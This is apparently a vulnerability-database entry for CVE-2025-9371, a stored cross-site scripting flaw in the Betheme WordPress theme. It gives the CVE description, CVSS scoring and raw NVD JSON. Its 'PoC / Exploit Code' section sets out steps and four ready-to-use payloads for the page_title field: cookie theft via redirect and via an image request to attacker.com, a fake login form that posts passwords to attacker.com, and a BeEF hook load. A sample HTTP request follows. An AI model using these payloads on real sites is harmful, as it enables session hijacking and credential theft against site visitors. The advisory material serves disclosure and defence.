Security Vulnerability Report
CVE-2025-9371 CVSS 6.4 MEDIUM

CVE-2025-9371

Published: 2025-10-09 12:15:36
Last Modified: 2026-04-15 00:35:42

Description

The Betheme theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘page_title’ parameter in all versions up to, and including, 28.1.6 due to insufficient input sanitization and output escaping of theme breadcrumbs. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Betheme for WordPress <= 28.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
CVE-2025-9371 PoC - Betheme Stored XSS via page_title parameter
Vulnerability: Stored Cross-Site Scripting in Betheme WordPress Theme
Affected versions: <= 28.1.6
Required access: Contributor-level or above
-->

<!--
Step 1: Login as Contributor-level user
Step 2: Create a new page/post
Step 3: Set the page_title (or post title) with malicious payload
Step 4: Submit for review (or get it published)
Step 5: When any user visits the page, the XSS payload executes
-->

<!-- Malicious page_title payload examples: -->

<!-- Payload 1: Cookie stealing -->
<script>document.location='https://attacker.com/steal.php?cookie='+document.cookie</script>

<!-- Payload 2: Admin session hijacking via image -->
<img src=x onerror="var i=new Image();i.src='https://attacker.com/log?d='+document.cookie;">

<!-- Payload 3: Fake login form overlay -->
<script>document.write('<form action="https://attacker.com/phish" method=POST><input name=username placeholder=Username><input name=password type=password placeholder=Password><button>Login</button></form>');</script>

<!-- Payload 4: BeEF hook injection -->
<script src="https://attacker.com:3000/hook.js"></script>

<!--
Note: The payload is injected into the page_title field which is then
rendered unsanitized in the Betheme breadcrumbs navigation component.
-->

<!-- Example HTTP request to create a malicious page (simplified): -->
<!--
POST /wp-admin/post-new.php HTTP/1.1
Host: target-wordpress-site.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=xxx

post_title=<script>alert(document.cookie)</script>&post_content=test&post_status=publish&...
-->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9371", "sourceIdentifier": "[email protected]", "published": "2025-10-09T12:15:35.807", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Betheme theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘page_title’ parameter in all versions up to, and including, 28.1.6 due to insufficient input sanitization and output escaping of theme breadcrumbs. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://themeforest.net/item/betheme-responsive-multipurpose-wordpress-theme/7758048#item-description__version-28-1-7-september-3rd-2025", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f9da9d45-39e2-4b07-baed-1f7d7f67602e?source=cve", "source": "[email protected]"}]}}